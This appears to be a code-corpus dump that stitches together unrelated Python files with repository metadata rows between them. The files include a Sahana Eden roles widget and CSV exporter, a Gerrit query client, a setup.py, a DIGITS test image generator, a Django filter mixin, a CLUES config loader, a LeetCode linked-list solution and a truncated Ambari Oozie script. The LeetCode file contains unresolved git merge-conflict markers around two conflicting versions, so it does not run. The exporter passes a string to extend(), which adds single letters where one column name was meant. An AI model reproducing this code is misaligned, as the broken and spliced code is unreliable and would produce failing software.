def inject_i18n(labels):
"""
Inject translations for screen messages rendered by the
client-side script
@param labels: dict of translations {messageKey: translation}
"""
strings = ['''i18n.%s="%s"''' % (k, s3_str(v))
for k, v in labels.items()]
current.response.s3.js_global.append("\n".join(strings))
# =============================================================================
class S3RolesWidget(object):
"""
Form widget to assign roles to users
"""
def __init__(self,
mode="roles",
items=None,
use_realms=False,
realm_types=None,
realms=None,
ajax_url=None,
):
"""
Constructor
@param mode: what to assign ("roles"|"users")
@param items: the assignable items (roles or users), dict,
structure see get_managed_roles/get_managed_users
@param use_realms: boolean, whether to use realms
@param realm_types: the realm types and their labels, tuple,
format see get_managed_realms
@param realms: the realms, dict, structure see get_managed_realms
@param ajax_url: the URL for Ajax modification of assignments
"""
self.mode = mode
self.items = items
self.use_realms = use_realms
self.realm_types = realm_types
self.realms = realms
self.ajax_url = ajax_url
# -------------------------------------------------------------------------
def __call__(self, field, value, **attributes):
"""
Form builder entry point
@param field: the Field
@param value: the current (or default) value of the field
@param attributes: HTML attributes for the widget
"""
T = current.T
# Widget ID
widget_id = attributes.get("_id") or str(field).replace(".", "_")
# Field name
name = attributes.get("_name") or field.name
# Extract the current assignments
if value:
assignments = self.get_current_assignments(value)
else:
assignments = []
# Construct the widget
widget = DIV(INPUT(_type = "hidden",
_name = name,
_value = value,
_id = widget_id + "-id",
),
INPUT(_type = "hidden",
_name = "assigned",
_value = json.dumps(assignments, separators=SEPARATORS),
_id = widget_id + "-data",
),
_id = widget_id,
_class = "rm-assign-widget",
)
# Client-side widget options
widget_opts = {"mode": self.mode,
"ajaxURL": self.ajax_url,
"items": self.items,
"useRealms": self.use_realms,
"realms": self.realms,
"realmTypes": self.realm_types,
}
# Localized strings for client-side widget
if self.mode == "roles":
CONFIRM = T("Do you want to remove the %(role)s role?")
else:
CONFIRM = T("Do you want to remove %(user)s from this role?")
i18n = {"rm_Add": T("Add"),
"rm_Cancel": T("Cancel"),
"rm_ConfirmDeleteAssignment": CONFIRM,
"rm_Delete": T("Delete"),
"rm_DeletionFailed": T("Deletion Failed"),
"rm_ForEntity": T("For Entity"),
"rm_Roles": T("Roles"),
"rm_SubmissionFailed": T("Submission Failed"),
"rm_Users": T("Users"),
}
# Inject the client-side script
self.inject_script(widget_id, widget_opts, i18n)
return widget
# -------------------------------------------------------------------------
def get_current_assignments(self, record_id):
"""
Get the current assignments for the user/role
@param record_id: the user or role ID
@returns: a list of tuples (roleID|userID, realmID)
"""
auth = current.auth
table = auth.settings.table_membership
if self.mode == "roles":
query = (table.user_id == record_id) & \
(table.group_id.belongs(set(self.items.keys())))
field = table.group_id
else:
query = (table.group_id == record_id) & \
(table.user_id.belongs(set(self.items.keys())))
field = table.user_id
use_realms = self.use_realms
if use_realms and \
not auth.s3_has_role(auth.get_system_roles().ADMIN):
managed_realms = set(self.realms.keys())
none = None in managed_realms
managed_realms.discard(None)
q = (table.pe_id.belongs(managed_realms)) if managed_realms else None
if none:
n = (table.pe_id == None)
q = q | n if q else n
if q:
query &= q
query &= (table.deleted == False)
rows = current.db(query).select(field, table.pe_id)
assignments = set()
for row in rows:
pe_id = row.pe_id if use_realms else None
assignments.add((row[field], pe_id))
return list(assignments)
# -------------------------------------------------------------------------
def inject_script(self, widget_id, options, i18n):
"""
Inject the necessary JavaScript for the widget
@param widget_id: the widget ID
(=element ID of the person_id field)
@param options: JSON-serializable dict of widget options
@param i18n: translations of screen messages rendered by
the client-side script,
a dict {messageKey: translation}
"""
s3 = current.response.s3
# Static script
if s3.debug:
script = "/%s/static/scripts/S3/s3.ui.roles.js" % \
current.request.application
else:
script = "/%s/static/scripts/S3/s3.ui.roles.min.js" % \
current.request.application
scripts = s3.scripts
if script not in scripts:
scripts.append(script)
self.inject_i18n(i18n)
# Widget options
opts = {}
if options:
opts.update(options)
# Widget instantiation
script = '''$('#%(widget_id)s').roleManager(%(options)s)''' % \
{"widget_id": widget_id,
"options": json.dumps(opts, separators=SEPARATORS),
}
jquery_ready = s3.jquery_ready
if script not in jquery_ready:
jquery_ready.append(script)
# -------------------------------------------------------------------------
@staticmethod
def inject_i18n(labels):
"""
Inject translations for screen messages rendered by the
client-side script
@param labels: dict of translations {messageKey: translation}
"""
strings = ['''i18n.%s="%s"''' % (k, s3_str(v))
for k, v in labels.items()]
current.response.s3.js_global.append("\n".join(strings))
# =============================================================================
class S3RolesExport(object):
"""
Roles Exporter
"""
def __init__(self, resource):
"""
Constructor
@param resource: the role resource (auth_group) with REST
filters; or None to export all groups
"""
db = current.db
auth = current.auth
# Optional columns
self.col_hidden = False
self.col_protected = False
self.col_entity = False
# Look up the roles
gtable = auth.settings.table_group
fields = ("id",
"uuid",
"role",
"description",
"hidden",
"protected",
"system",
)
if resource and resource.tablename == str(gtable):
roles = resource.select(fields, as_rows=True)
else:
query = (gtable.deleted == False)
roles = db(query).select(*fields)
# Generate roles dict
role_dicts = {}
for role in roles:
role_dict = {"uid": role.uuid,
"role": role.role,
"description": role.description,
}
if role.hidden:
self.col_hidden = True
role_dict["hidden"] = "true"
if role.protected and not role.system:
self.col_protected = True
role_dict["protected"] = "true"
role_dicts[role.id] = role_dict
self.roles = role_dicts
# Look up all rules, ordered by UID, controller, function, table
rtable = auth.permission.table
query = (rtable.group_id.belongs(set(role_dicts.keys()))) & \
(rtable.deleted == False)
rules = db(query).select(rtable.id,
rtable.group_id,
rtable.controller,
rtable.function,
rtable.tablename,
rtable.uacl,
rtable.oacl,
rtable.entity,
)
self.rules = rules
# Look up all org entities
entities = set()
for rule in rules:
entity = rule.entity
if entity is not None:
self.col_entity = True
entities.add(entity)
otable = current.s3db.org_organisation
query = (otable.pe_id.belongs(entities)) & \
(otable.deleted == False)
self.orgs = db(query).select(otable.pe_id,
otable.name,
).as_dict(key="pe_id")
# -------------------------------------------------------------------------
def as_csv(self):
"""
Export the current roles and permissions as CSV,
suitable for prepop (see S3BulkImporter.import_role)
@returns: a StringIO containing the CSV
"""
import csv
# Optional columns
col_protected = self.col_protected
col_hidden = self.col_hidden
col_entity = self.col_entity
# Role fields
fieldnames = ["uid", "role", "description"]
if col_hidden:
fieldnames.append("hidden")
if col_protected:
fieldnames.append("protected")
# Rule fields
fieldnames.extend(["controller", "function", "table", "uacl", "oacl"])
if col_entity:
fieldnames.extend("entity")
# Helper to get the role UID for a rule
role_dicts = self.roles
def get_uid(group_id):
role_dict = role_dicts.get(group_id)
return role_dict.get("uid") if role_dict else None
# Sort the rules
rules = sorted(self.rules,
key = lambda rule: (get_uid(rule.group_id),
rule.controller or "zzzzzz",
rule.function or "",
rule.tablename or "",
))
# Create the CSV
f = StringIO()
writer = csv.DictWriter(f, fieldnames=fieldnames)
writer.writeheader()
# Write the rules to the CSV
orgs = self.orgs
encode_permissions = self.encode_permissions
for rule in rules:
role_dict = role_dicts.get(rule.group_id)
if not role_dict:
continue
rule_dict = {}
# The entity column (optional)
if col_entity:
entity = rule.entity
if entity is not None:
if entity == 0:
rule_dict["entity"] = "any"
else:
org = orgs.get(entity)
if org:
rule_dict["entity"] = org
else:
continue
# The target columns (controller, function, table)
if rule.tablename:
rule_dict["table"] = rule.tablename
else:
if rule.controller:
rule_dict["controller"] = rule.controller
if rule.function:
rule_dict["function"] = rule.function
# The permission columns (uacl, oacl)
uacl = encode_permissions(rule.uacl, explicit_none=True)
if uacl:
rule_dict["uacl"] = uacl
oacl = encode_permissions(rule.oacl & ~(rule.uacl))
if oacl:
rule_dict["oacl"] = oacl
# Add role columns
rule_dict.update(role_dict)
# Write the rule
writer.writerow(rule_dict)
f.seek(0)
return f
# -------------------------------------------------------------------------
@staticmethod
def encode_permissions(permissions, explicit_none=False):
"""
Encodes a permission bitmap as string, using the permission
labels from S3Permission.PERMISSION_OPTS
@param permissions: the permission bitmap
@param explicit_none: return "NONE" if no permission bit set
(otherwise returns None)
"""
if not permissions:
if explicit_none:
return "NONE"
else:
return None
opts = current.auth.permission.PERMISSION_OPTS
labels = []
for bit in opts:
if permissions & bit:
labels.append(opts[bit])
return "|".join(labels)
# END =========================================================================
| mit | 2,148,195,638,398,239,000 | 34.396073 | 119 | 0.441798 | false |
berrange/gerrymander | gerrymander/operations.py | 1 | 5420 | #
# Copyright (C) 2014 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from gerrymander.model import ModelChange
from gerrymander.model import ModelEvent
class OperationBase(object):
def __init__(self, client):
self.client = client
class OperationQuery(OperationBase):
PATCHES_NONE = "none"
PATCHES_CURRENT = "current"
PATCHES_ALL = "all"
STATUS_SUBMITTED = "submitted"
STATUS_REVIEWED = "reviewed"
STATUS_MERGED = "merged"
STATUS_ABANDONED = "abandoned"
STATUS_OPEN = "open"
STATUS_CLOSED = "closed"
def __init__(self, client, terms={}, rawquery=None, patches=PATCHES_NONE,
approvals=False, files=False, comments=False, deps=False):
OperationBase.__init__(self, client)
self.terms = terms
self.rawquery = rawquery
self.patches = patches
self.approvals = approvals
self.files = files
self.comments = comments
self.deps = deps
if self.patches == OperationQuery.PATCHES_NONE:
if self.approvals:
raise Exception("approvals cannot be requested without patches")
if self.files:
raise Exception("files cannot be requested without patches")
def get_args(self, limit=None, offset=None, sortkey=None):
args = ["query", "--format=JSON"]
if self.patches == OperationQuery.PATCHES_CURRENT:
args.append("--current-patch-set")
elif self.patches == OperationQuery.PATCHES_ALL:
args.append("--patch-sets")
if self.approvals:
args.append("--all-approvals")
if self.files:
args.append("--files")
if self.comments:
args.append("--comments")
if self.deps:
args.append("--dependencies")
clauses = []
if offset is not None:
args.append("--start")
args.append("%d" % offset)
if limit is not None:
clauses.append("limit:" + str(limit))
if sortkey is not None:
clauses.append("resume_sortkey:" + sortkey)
if self.rawquery is not None:
clauses.append("(" + self.rawquery + ")")
terms = list(self.terms.keys())
terms.sort()
for term in terms:
negateAll = False
terms = self.terms[term]
if len(terms) > 0 and terms[0] == "!":
negateAll = True
terms = terms[1:]
if len(terms) == 0:
continue
subclauses = []
for value in terms:
subclauses.append("%s:%s" % (term, value))
clause = " OR ".join(subclauses)
if negateAll:
clause = "( NOT ( " + clause + " ) )"
else:
clause = "( " + clause + " )"
clauses.append(clause)
args.append(" AND ".join(clauses))
return args
def run(self, cb, limit=None):
class tracker(object):
def __init__(self):
self.gotany = True
self.count = 0
self.sortkey = None
self.has_more = False
c = tracker()
def mycb(line):
if 'rowCount' in line:
# New gerrit sets 'moreChanges'
if 'moreChanges' in line:
c.has_more = line['moreChanges']
return
if 'type' in line and line['type'] == "error":
raise Exception(line['message'])
change = ModelChange.from_json(line)
# Old gerrit sets 'sortKey'
if "sortKey" in line:
c.sortkey = line["sortKey"]
c.gotany = True
c.count = c.count + 1
cb(change)
if limit is None:
while c.gotany:
c.gotany = False
offset = None
if c.has_more:
offset = c.count
self.client.run(self.get_args(500, offset, c.sortkey), mycb)
if not c.sortkey and not c.has_more:
break
else:
while c.count < limit and c.gotany:
want = limit - c.count
if want > 500:
want = 500
c.gotany = False
offset = None
if c.has_more:
offset = c.count
self.client.run(self.get_args(want, offset, c.sortkey), mycb)
if not c.sortkey and not c.has_more:
break
return 0
class OperationWatch(OperationBase):
def __init__(self, client):
OperationBase.__init__(self, client)
def run(self, cb):
def mycb(line):
event = ModelEvent.from_json(line)
if event:
cb(event)
return self.client.run(["stream-events"], mycb)
| apache-2.0 | 132,657,920,464,158,480 | 31.071006 | 80 | 0.533948 | false |
Hawaii-Smart-Energy-Project/Maui-Smart-Grid | setup.py | 1 | 4642 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Setup script for MSG Data Processing and Operations.
Additional file-based inclusions can be found in MANIFEST.in.
The distribution archive is created as a source distribution,
http://docs.python.org/2/distutils/sourcedist.html, using
python setup.py sdist
Installation is performed using
python setup.py install [--prefix=${LIBRARY_PATH} --exec-prefix=${BIN_PATH]
where the path arguments within the square brackets are optional.
"""
__author__ = 'Daniel Zhang (張道博)'
__copyright__ = 'Copyright (c) 2014, University of Hawaii Smart Energy Project'
__license__ = 'https://raw.github' \
'.com/Hawaii-Smart-Energy-Project/Maui-Smart-Grid/master/BSD' \
'-LICENSE.txt'
from distutils.core import setup
setup(name = 'Maui-Smart-Grid', version = '1.0.0',
description = 'Data Processing and Data Operations for the Maui Smart '
'Grid Project.',
long_description = 'The University of Hawaii at Manoa was tasked with '
'maintaining a data repository for use by analysts '
'for the Maui Smart Grid (http://www.mauismartgrid'
'.com) energy sustainability project through the '
'Hawaii Natural Energy Institute (http://www.hnei'
'.hawaii.edu). This software provides the data '
'processing and operational resources necessary to '
'accomplish this task. Source data arrives in '
'multiple formats including XML, tab-separated '
'values, and comma-separated values. Issues for this'
' project are tracked at the Hawaii Smart Energy '
'Project YouTRACK instance ('
'http://smart-energy-project.myjetbrains'
'.com/youtrack/rest/agile).',
author = 'Daniel Zhang (張道博)',
author_email = 'See https://github.com/dz1111',
url = 'https://github.com/Hawaii-Smart-Energy-Project/Maui-Smart-Grid',
license = 'https://raw.github'
'.com/Hawaii-Smart-Energy-Project/Maui-Smart-Grid/master/BSD'
'-LICENSE.txt', platforms = 'OS X, Linux',
package_dir = {'': 'src'},
py_modules = [
'filelock',
'meco_data_autoloader',
'meco_db_delete',
'meco_db_insert',
'meco_db_read',
'meco_dupe_check',
'meco_fk',
'meco_mapper',
'meco_plotting',
'meco_pv_readings_in_nonpv_mlh_notifier',
'meco_xml_parser',
'msg_aggregated_data',
'msg_configer',
'msg_data_aggregator',
'msg_data_verifier',
'msg_db_connector',
'msg_db_exporter',
'msg_db_util',
'msg_file_util',
'msg_logger',
'msg_math_util',
'msg_noaa_weather_data_dupe_checker',
'msg_noaa_weather_data_inserter',
'msg_noaa_weather_data_parser',
'msg_noaa_weather_data_util',
'msg_notifier',
'msg_python_util',
'msg_time_util',
'msg_types'
],
scripts = [
'src/automated-scripts/aggregateNewData.py',
'src/automated-scripts/autoloadNewMECOData.py',
'src/automated-scripts/exportDBsToCloud.py',
'src/automated-scripts/insertCompressedNOAAWeatherData.py',
'src/automated-scripts/insertMECOEnergyData.py',
'src/automated-scripts/insertSingleMECOEnergyDataFile.py',
'src/automated-scripts/reportExportSummary.py',
'src/automated-scripts/retrieveNOAAWeatherData.py',
'src/static-data-insert/insertCleanSCADAVoltageAndTapData.py',
'src/static-data-insert/insertLocationRecords.py',
'src/static-data-insert/insertMECOMeterLocationHistoryData.py',
'src/static-data-insert/insertMeterRecords.py',
'src/static-data-insert/insertNRELIrradianceData.py',
'src/static-data-insert/insertPowerMeterEvents.py',
'src/static-data-insert/insertSCADAWeatherData.py'
])
| bsd-3-clause | 7,457,005,088,255,912,000 | 43.951456 | 80 | 0.540605 | false |
ctrevino/DIGITS | digits/dataset/images/classification/test_imageset_creator.py | 1 | 2642 | #!/usr/bin/env python
"""
Functions for creating temporary datasets
Used in test_views
"""
import os
import time
import argparse
from collections import defaultdict
import numpy as np
import PIL.Image
IMAGE_SIZE = 10
IMAGE_COUNT = 10 # per category
def create_classification_imageset(folder, image_size=None, image_count=None):
"""
Creates a folder of folders of images for classification
"""
if image_size is None:
image_size = IMAGE_SIZE
if image_count is None:
image_count = IMAGE_COUNT
# Stores the relative path of each image of the dataset
paths = defaultdict(list)
for class_name, pixel_index, rotation in [
('red-to-right', 0, 0),
('green-to-top', 1, 90),
('blue-to-left', 2, 180),
]:
os.makedirs(os.path.join(folder, class_name))
colors = np.linspace(200, 255, image_count)
for i, color in enumerate(colors):
pixel = [0, 0, 0]
pixel[pixel_index] = color
pil_img = _create_gradient_image(image_size, (0, 0, 0), pixel, rotation)
img_path = os.path.join(class_name, str(i) + '.png')
pil_img.save(os.path.join(folder, img_path))
paths[class_name].append(img_path)
return paths
def _create_gradient_image(size, color_from, color_to, rotation):
"""
Make an image with a color gradient with a specific rotation
"""
# create gradient
rgb_arrays = [np.linspace(color_from[x], color_to[x], size).astype('uint8') for x in range(3)]
gradient = np.concatenate(rgb_arrays)
# extend to 2d
picture = np.repeat(gradient, size)
picture.shape = (3, size, size)
# make image and rotate
image = PIL.Image.fromarray(picture.T)
image = image.rotate(rotation)
return image
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Create-Imageset tool - DIGITS')
### Positional arguments
parser.add_argument('folder',
help='Where to save the images'
)
### Optional arguments
parser.add_argument('-s', '--image_size',
type=int,
help='Size of the images')
parser.add_argument('-c', '--image_count',
type=int,
help='How many images')
args = vars(parser.parse_args())
print 'Creating images at "%s" ...' % args['folder']
start_time = time.time()
create_classification_imageset(args['folder'],
image_size=args['image_size'],
image_count=args['image_count'],
)
print 'Done after %s seconds' % (time.time() - start_time,)
| bsd-3-clause | 678,515,116,100,906,200 | 25.686869 | 98 | 0.603331 | false |
alixedi/django_filtered_feed | filtered_feed/viewmixins.py | 1 | 1615 | from django.core.exceptions import ImproperlyConfigured
class ListFilteredMixin(object):
"""
Mixin that adds support for django-filter to a vanilla ListView
"""
filter_set = None
def get_filter_set(self):
if self.filter_set:
return self.filter_set
else:
raise ImproperlyConfigured(
"ListFilterMixin requires either a definition of "
"'filter_set' or an implementation of 'get_filter()'")
def get_filter_set_kwargs(self):
"""
Returns the keyword arguments for instanciating the filterset.
"""
return {
'data': self.request.GET,
'queryset': self.get_base_queryset(),
}
def get_base_queryset(self):
"""
We can decided to either alter the queryset before or after applying the
FilterSet
"""
return super(ListFilteredMixin, self).get_queryset()
def get_constructed_filter(self):
# We need to store the instantiated FilterSet cause we use it in
# get_queryset and in get_context_data
if getattr(self, 'constructed_filter', None):
return self.constructed_filter
else:
f = self.get_filter_set()(**self.get_filter_set_kwargs())
self.constructed_filter = f
return f
def get_queryset(self):
return self.get_constructed_filter().qs
def get_context_data(self, **kwargs):
kwargs.update({'filter': self.get_constructed_filter()})
return super(ListFilteredMixin, self).get_context_data(**kwargs)
| bsd-3-clause | -8,823,770,713,935,860,000 | 30.057692 | 80 | 0.60805 | false |
grycap/clues | configcli.py | 1 | 3019 | #!/usr/bin/env python
#
# CLUES - Cluster Energy Saving System
# Copyright (C) 2015 - GRyCAP - Universitat Politecnica de Valencia
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import cpyutils.config
cpyutils.config.set_paths([ './etc/', '~/clues2/etc/', '/etc/clues2/' ])
cpyutils.config.set_main_config_file("clues2.cfg")
cpyutils.config.set_config_filter(filter_="*.cfg")
try:
config_client
except:
config_client = cpyutils.config.Configuration(
"client",
{
"CLUES_SECRET_TOKEN": "",
"CLUES_XMLRPC":"http://localhost:8000/RPC2",
"CLUES_REQUEST_WAIT_TIMEOUT":300,
"LOG_FILE":"/var/log/clues2/clues2-cli.log",
"LOG_LEVEL":"debug"
}
)
config_client.maploglevel("LOG_LEVEL")
import logging
try:
from xmlrpclib import ServerProxy
except ImportError:
from xmlrpc.client import ServerProxy
logging.basicConfig(filename=config_client.LOG_FILE, level=config_client.LOG_LEVEL, format='%(asctime)-15s %(message)s')
def get_clues_proxy_from_config():
global config_client
return ServerProxy(config_client.CLUES_XMLRPC)
try:
config_general
except:
class ConfigGeneral(cpyutils.config.Configuration):
def parseconfig(self):
import logging
if self.LOG_FILE == "":
self.LOG_FILE = None
llevel = self.LOG_LEVEL.lower()
if llevel == "debug":
self.LOG_LEVEL = logging.DEBUG
elif llevel == "info":
self.LOG_LEVEL = logging.INFO
elif llevel == "warning":
self.LOG_LEVEL = logging.WARNING
elif llevel == "error":
self.LOG_LEVEL = logging.ERROR
else:
self.LOG_LEVEL = logging.DEBUG
config_general = ConfigGeneral(
"general",
{
"LOG_FILE":"",
"LOG_LEVEL":"debug",
},
callback = ConfigGeneral.parseconfig
)
'''
try:
config_client
except:
config_client = cpyutils.config.Configuration(
"client",
{
"LOG_FILE":config_general.LOG_FILE,
"CLUES_REMOTE_SERVER_SECRET_TOKEN":"",
"CLUES_REMOTE_SERVER_PORT":8000,
"CLUES_REMOTE_SERVER_HOST":"localhost",
"CLUES_REMOTE_SERVER_INSECURE": False,
}
)
'''
| gpl-3.0 | -422,944,129,268,004,300 | 31.815217 | 124 | 0.60848 | false |
menghanY/LeetCode-Python | LinkedList/SwapNodesInPairs.py | 1 | 1237 | <<<<<<< HEAD
from ListNode import ListNode
class Solution(object):
def swapPairs(self, head):
if not head or not head.next :
return head
resNode = head.next
while head :
pre = head
head = head.next.next
=======
# https://leetcode.com/problems/swap-nodes-in-pairs/
from ListNode import ListNode
class Solution(object):
def swapPairs(self, head):
if not head:
return []
if not head.next:
return head
r_head = ListNode(0)
l = r_head
l.next = head
m = head
r = head.next
while m or r:
if not r:
return r_head.next
else:
m.next = r.next
r.next = m
l.next = r
m = m.next
r = r.next.next
l = l.next.next
if r:
r = r.next
return r_head.next
four = ListNode(4)
three = ListNode(3)
two = ListNode(2)
one = ListNode(1)
one.next = two
two.next = three
three.next = four
# while one :
# print(one.val)
# one = one.next
Solution().swapPairs(one)
>>>>>>> 83d0b11e2eaab6e16fd7a88d6e65f2bdbd6dbe15
| mit | 8,618,302,866,557,902,000 | 19.278689 | 52 | 0.497171 | false |
alexryndin/ambari | ambari-server/src/main/resources/common-services/OOZIE/4.0.0.2.0/package/scripts/oozie.py | 1 | 23458 | #!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Python Imports
import os
import re
# Resource Management Imports
from resource_management.core.resources.service import ServiceConfig
from resource_management.core.resources.system import Directory, Execute, File
from resource_management.core.source import DownloadSource
from resource_management.core.source import InlineTemplate
from resource_management.core.source import Template
from resource_management.libraries.functions.format import format
from resource_management.libraries.functions.default import default
from resource_management.libraries.functions import StackFeature
from resource_management.libraries.functions.version import format_stack_version
from resource_management.libraries.functions.stack_features import check_stack_feature
from resource_management.libraries.functions.oozie_prepare_war import prepare_war
from resource_management.libraries.functions.copy_tarball import get_current_version
from resource_management.libraries.resources.xml_config import XmlConfig
from resource_management.libraries.script.script import Script
from resource_management.libraries.functions.security_commons import update_credential_provider_path
from resource_management.core.resources.packaging import Package
from resource_management.core.shell import as_user, as_sudo, call
from resource_management.core.exceptions import Fail
from resource_management.libraries.functions.setup_atlas_hook import has_atlas_in_cluster, setup_atlas_hook
from ambari_commons.constants import SERVICE, UPGRADE_TYPE_NON_ROLLING, UPGRADE_TYPE_ROLLING
from resource_management.libraries.functions.constants import Direction
from ambari_commons.os_family_impl import OsFamilyFuncImpl, OsFamilyImpl
from ambari_commons import OSConst
from ambari_commons.inet_utils import download_file
from resource_management.core import Logger
@OsFamilyFuncImpl(os_family=OSConst.WINSRV_FAMILY)
def oozie(is_server=False, upgrade_type=None):
import params
from status_params import oozie_server_win_service_name
XmlConfig("oozie-site.xml",
conf_dir=params.oozie_conf_dir,
configurations=params.config['configurations']['oozie-site'],
owner=params.oozie_user,
mode='f',
configuration_attributes=params.config['configuration_attributes']['oozie-site']
)
File(os.path.join(params.oozie_conf_dir, "oozie-env.cmd"),
owner=params.oozie_user,
content=InlineTemplate(params.oozie_env_cmd_template)
)
Directory(params.oozie_tmp_dir,
owner=params.oozie_user,
create_parents = True,
)
if is_server:
# Manually overriding service logon user & password set by the installation package
ServiceConfig(oozie_server_win_service_name,
action="change_user",
username = params.oozie_user,
password = Script.get_password(params.oozie_user))
download_file(os.path.join(params.config['hostLevelParams']['jdk_location'], "sqljdbc4.jar"),
os.path.join(params.oozie_root, "extra_libs", "sqljdbc4.jar")
)
webapps_sqljdbc_path = os.path.join(params.oozie_home, "oozie-server", "webapps", "oozie", "WEB-INF", "lib", "sqljdbc4.jar")
if os.path.isfile(webapps_sqljdbc_path):
download_file(os.path.join(params.config['hostLevelParams']['jdk_location'], "sqljdbc4.jar"),
webapps_sqljdbc_path
)
download_file(os.path.join(params.config['hostLevelParams']['jdk_location'], "sqljdbc4.jar"),
os.path.join(params.oozie_home, "share", "lib", "oozie", "sqljdbc4.jar")
)
download_file(os.path.join(params.config['hostLevelParams']['jdk_location'], "sqljdbc4.jar"),
os.path.join(params.oozie_home, "temp", "WEB-INF", "lib", "sqljdbc4.jar")
)
# TODO: see if see can remove this
@OsFamilyFuncImpl(os_family=OsFamilyImpl.DEFAULT)
def oozie(is_server=False, upgrade_type=None):
import params
if is_server:
params.HdfsResource(params.oozie_hdfs_user_dir,
type="directory",
action="create_on_execute",
owner=params.oozie_user,
mode=params.oozie_hdfs_user_mode
)
params.HdfsResource(None, action="execute")
Directory(params.conf_dir,
create_parents = True,
owner = params.oozie_user,
group = params.user_group
)
params.oozie_site = update_credential_provider_path(params.oozie_site,
'oozie-site',
os.path.join(params.conf_dir, 'oozie-site.jceks'),
params.oozie_user,
params.user_group
)
XmlConfig("oozie-site.xml",
conf_dir = params.conf_dir,
configurations = params.oozie_site,
configuration_attributes=params.config['configuration_attributes']['oozie-site'],
owner = params.oozie_user,
group = params.user_group,
mode = 0664
)
File(format("{conf_dir}/oozie-env.sh"),
owner=params.oozie_user,
content=InlineTemplate(params.oozie_env_sh_template),
group=params.user_group,
)
# On some OS this folder could be not exists, so we will create it before pushing there files
Directory(params.limits_conf_dir,
create_parents=True,
owner='root',
group='root'
)
File(os.path.join(params.limits_conf_dir, 'oozie.conf'),
owner='root',
group='root',
mode=0644,
content=Template("oozie.conf.j2")
)
if (params.log4j_props != None):
File(format("{params.conf_dir}/oozie-log4j.properties"),
mode=0644,
group=params.user_group,
owner=params.oozie_user,
content=InlineTemplate(params.log4j_props)
)
elif (os.path.exists(format("{params.conf_dir}/oozie-log4j.properties"))):
File(format("{params.conf_dir}/oozie-log4j.properties"),
mode=0644,
group=params.user_group,
owner=params.oozie_user
)
if params.stack_version_formatted and check_stack_feature(StackFeature.OOZIE_ADMIN_USER, params.stack_version_formatted):
File(format("{params.conf_dir}/adminusers.txt"),
mode=0644,
group=params.user_group,
owner=params.oozie_user,
content=Template('adminusers.txt.j2', oozie_admin_users=params.oozie_admin_users)
)
else:
File ( format("{params.conf_dir}/adminusers.txt"),
owner = params.oozie_user,
group = params.user_group
)
if params.jdbc_driver_name == "com.mysql.jdbc.Driver" or \
params.jdbc_driver_name == "com.microsoft.sqlserver.jdbc.SQLServerDriver" or \
params.jdbc_driver_name == "org.postgresql.Driver" or \
params.jdbc_driver_name == "oracle.jdbc.driver.OracleDriver":
File(format("/usr/lib/ambari-agent/{check_db_connection_jar_name}"),
content = DownloadSource(format("{jdk_location}{check_db_connection_jar_name}")),
)
pass
oozie_ownership()
if is_server:
oozie_server_specific(upgrade_type)
def oozie_ownership():
import params
File ( format("{conf_dir}/hadoop-config.xml"),
owner = params.oozie_user,
group = params.user_group
)
File ( format("{conf_dir}/oozie-default.xml"),
owner = params.oozie_user,
group = params.user_group
)
Directory ( format("{conf_dir}/action-conf"),
owner = params.oozie_user,
group = params.user_group
)
File ( format("{conf_dir}/action-conf/hive.xml"),
owner = params.oozie_user,
group = params.user_group
)
def get_oozie_ext_zip_source_paths(upgrade_type, params):
"""
Get an ordered list of Oozie ext zip file paths from the source stack.
:param upgrade_type: Upgrade type will be None if not in the middle of a stack upgrade.
:param params: Expected to contain fields for ext_js_path, upgrade_direction, source_stack_name, and ext_js_file
:return: Source paths to use for Oozie extension zip file
"""
# Default to /usr/share/$TARGETSTACK-oozie/ext-2.2.zip
paths = []
source_ext_js_path = params.ext_js_path
# Preferred location used by HDP and BigInsights 4.2.5
if upgrade_type is not None and params.upgrade_direction == Direction.UPGRADE:
source_ext_js_path = "/usr/share/" + params.source_stack_name.upper() + "-oozie/" + params.ext_js_file
paths.append(source_ext_js_path)
# Alternate location used by BigInsights 4.2.0 when migrating to another stack.
paths.append("/var/lib/oozie/" + params.ext_js_file)
return paths
def oozie_server_specific(upgrade_type):
import params
no_op_test = as_user(format("ls {pid_file} >/dev/null 2>&1 && ps -p `cat {pid_file}` >/dev/null 2>&1"), user=params.oozie_user)
File(params.pid_file,
action="delete",
not_if=no_op_test
)
oozie_server_directories = [format("{oozie_home}/{oozie_tmp_dir}"), params.oozie_pid_dir, params.oozie_log_dir, params.oozie_tmp_dir, params.oozie_data_dir, params.oozie_lib_dir, params.oozie_webapps_dir, params.oozie_webapps_conf_dir, params.oozie_server_dir]
Directory( oozie_server_directories,
owner = params.oozie_user,
group = params.user_group,
mode = 0755,
create_parents = True,
cd_access="a",
)
Directory(params.oozie_libext_dir,
create_parents = True,
)
hashcode_file = format("{oozie_home}/.hashcode")
skip_recreate_sharelib = format("test -f {hashcode_file} && test -d {oozie_home}/share")
untar_sharelib = ('tar','-xvf',format('{oozie_home}/oozie-sharelib.tar.gz'),'-C',params.oozie_home)
Execute( untar_sharelib, # time-expensive
not_if = format("{no_op_test} || {skip_recreate_sharelib}"),
sudo = True,
)
configure_cmds = []
